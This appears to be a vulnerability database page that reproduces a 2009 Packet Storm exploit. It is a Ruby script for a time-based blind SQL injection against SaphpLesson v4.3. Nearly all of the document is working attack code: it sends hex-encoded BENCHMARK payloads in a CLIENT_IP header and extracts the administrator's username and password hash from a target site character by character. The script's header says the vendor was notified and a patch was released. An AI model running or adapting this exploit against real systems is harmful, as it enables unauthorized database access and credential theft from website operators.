SaphpLesson 4.3 SQL Injection

🗓️ 16 Sep 2009 00:00:00Reported by Jafer Al ZidjaliType

packetstorm🔗 packetstormsecurity.com👁 15 Views

SaphpLesson v4.3 Blind SQL Injection Vulnerability discovered by Jafer Al Zidjali 21-08-2009, public patch released, average and delayed response time testing, retrieving username length and characters

`#!/usr/bin/ruby  
  
#=============================================#  
# SaphpLesson v4.3 Exploit #  
# Blind SQL Injection Vulnerability #  
#---------------------------------------------#  
# Date: 21-08-2009 #  
# Discovered & written by: Jafer Al Zidjali #  
# Email: jafer[at]scorpionds.com #  
# Website: www.scorpionds.com #  
#---------------------------------------------#  
# Notes: #  
# 1. Author has been notified #  
# 2. A public patch has been released #  
#=============================================#  
  
  
require "net/http"  
require "base64"  
  
intro=[  
"+=============================================+",  
"+ SaphpLesson v4.3 Exploit +",  
"+ Blind SQL Injection Vulnerability +",  
"+ Discovered & written by: Jafer Al Zidjali +",  
"+ Email: jafer[at]scorpionds.com +",  
"+ Website: www.scorpionds.com +",  
"+=============================================+"  
]  
  
def print_intro text  
w="|"  
text.each do |str|  
str.scan(/./) do |c|  
STDOUT.flush  
if w=="|"   
print "\b"+c +w  
w="/"  
elsif w=="/"   
print "\b"+c +w  
w="-"   
elsif w=="-"   
print "\b"+c +w  
w="\\"   
else  
print "\b"+c +w  
w="|"  
end  
sleep 0.04  
end  
print "\b "  
puts ""  
end  
end  
  
print_intro intro  
  
puts "\nEnter host name (e.g. example.com):"  
host=gets.chomp  
  
puts "\nEnter script path (e.g. /saphplesson/):"  
path=gets.chomp  
  
  
puts "\nGetting average response time..."  
  
avgTime=Array.new(5)  
  
5.times do |c|  
s=Time.now  
http = Net::HTTP.new(host, 80)  
resp= http.get(path)  
w=resp.body  
avgTime[c]=Time.now-s  
puts avgTime[c]  
end  
  
sum=0  
5.times {|c| sum+=avgTime[c]}  
avg=sum/5.0  
puts "Average response time is: #{avg*3.0}"  
  
puts "\nTesting delayed response time..."  
delTime=Array.new(5)  
  
5.times do |t|  
delay=1000000*((t+1)*10)  
header={  
"CLIENT_IP" => "\x27\x20\x55\x4e\x49\x4f\x4e\x20\x53\x45\x4c\x45\x43\x54"+  
"\x20\x49\x46\x28\x31\x3d\x31\x2c\x42\x45\x4e\x43\x48\x4d"+  
"\x41\x52\x4b\x28#{delay}\x2c\x63\x68\x61\x72\x28\x63\x68"+  
"\x61\x72\x28\x32\x29\x29\x29\x2c\x33\x34\x33\x34\x29\x20\x23\x20"  
}  
s=Time.now  
http = Net::HTTP.new(host, 80)  
resp= http.get(path,header)  
w=resp.body  
s=Time.now-s  
delTime[t]=delay  
puts "["+(t+1).to_s+"] #{s}"  
end  
  
puts "\nChoose a delyed response time (it should be > average response time):"  
sel=gets.chomp  
  
print "\nGetting username length"  
ulen=0  
  
20.times do |z|  
header={  
"CLIENT_IP" => "\x27\x20\x55\x4e\x49\x4f\x4e\x20\x53\x45\x4c\x45\x43\x54"+  
"\x20\x49\x46\x28\x6c\x65\x6e\x67\x74\x68\x28\x28\x73\x65\x6c\x65\x63\x74"+  
"\x20\x4d\x6f\x64\x4e\x61\x6d\x65\x20\x66\x72\x6f\x6d\x20\x6d\x6f\x64\x72"+  
"\x65\x74\x6f\x72\x20\x77\x68\x65\x72\x65\x20\x4d\x6f\x64\x49\x44\x3d\x31"+  
"\x29\x29\x3d#{z+1}\x2c\x42\x45\x4e\x43\x48\x4d\x41\x52\x4b\x28#{delTime[(sel.to_i)-1]}"+  
"\x2c\x63\x68\x61\x72\x28\x63\x68\x61\x72\x28\x32\x29\x29\x29\x2c\x33\x34\x33\x34\x29\x20\x23\x20"  
}  
s=Time.now  
http = Net::HTTP.new(host, 80)  
resp= http.get(path,header)  
w=resp.body  
s=Time.now-s  
print "."  
if (s>(avg*3.0))  
ulen=z+1  
break;  
end  
STDOUT.flush  
end  
  
puts "\n\nUsername length: "+ ulen.to_s  
  
puts "\n\nUsername: "  
chars="abcdefghijklmnopqrstuvwxyz0123456789"  
  
ulen.times do |z|  
chars.scan(/./) do |c|  
header={  
"CLIENT_IP" => "\x27\x20\x55\x4e\x49\x4f\x4e\x20\x53\x45\x4c\x45\x43"+  
"\x54\x20\x49\x46\x28\x73\x75\x62\x73\x74\x72\x69\x6e\x67\x28\x28\x73"+  
"\x65\x6c\x65\x63\x74\x20\x4d\x6f\x64\x4e\x61\x6d\x65\x20\x66\x72\x6f"+  
"\x6d\x20\x6d\x6f\x64\x72\x65\x74\x6f\x72\x20\x77\x68\x65\x72\x65\x20"+  
"\x4d\x6f\x64\x49\x44\x3d\x31\x29\x2c#{z+1}\x2c\x31\x29\x3d\x27#{c}\x27"+  
"\x2c\x42\x45\x4e\x43\x48\x4d\x41\x52\x4b\x28#{delTime[(sel.to_i)-1]}"+  
"\x2c\x63\x68\x61\x72\x28\x63\x68\x61\x72\x28\x32\x29\x29\x29\x2c\x33"+  
"\x34\x33\x34\x29\x20\x23\x20"  
}  
s=Time.now  
http = Net::HTTP.new(host, 80)  
resp= http.get(path,header)  
w=resp.body  
s=Time.now-s  
print c  
if (s>(avg*3.0))  
break;  
end  
print "\b"  
STDOUT.flush  
end  
end  
  
puts "\n\nPassword hash: "  
chars="0123456789abcdef"  
  
32.times do |z|  
chars.scan(/./) do |c|  
header={  
"CLIENT_IP" => "\x27\x20\x55\x4e\x49\x4f\x4e\x20\x53\x45\x4c\x45\x43\x54"+  
"\x20\x49\x46\x28\x73\x75\x62\x73\x74\x72\x69\x6e\x67\x28\x28\x73\x65\x6c"+  
"\x65\x63\x74\x20\x4d\x6f\x64\x50\x61\x73\x73\x77\x6f\x72\x64\x20\x66\x72"+  
"\x6f\x6d\x20\x6d\x6f\x64\x72\x65\x74\x6f\x72\x20\x77\x68\x65\x72\x65\x20"+  
"\x4d\x6f\x64\x49\x44\x3d\x31\x29\x2c#{z+1}\x2c\x31\x29\x3d\x27#{c}\x27\x2c"+  
"\x42\x45\x4e\x43\x48\x4d\x41\x52\x4b\x28#{delTime[(sel.to_i)-1]}"+  
"\x2c\x63\x68\x61\x72\x28\x63\x68\x61\x72\x28\x32\x29\x29\x29\x2c\x33\x34"+  
"\x33\x34\x29\x20\x23\x20"  
}  
s=Time.now  
http = Net::HTTP.new(host, 80)  
resp= http.get(path,header)  
w=resp.body  
s=Time.now-s  
print c  
if (s>(avg*3.0))  
break;  
end  
print "\b"  
STDOUT.flush  
end  
end  
  
`

16 Sep 2009 00:00Current

0.1Low risk

Vulners AI Score0.1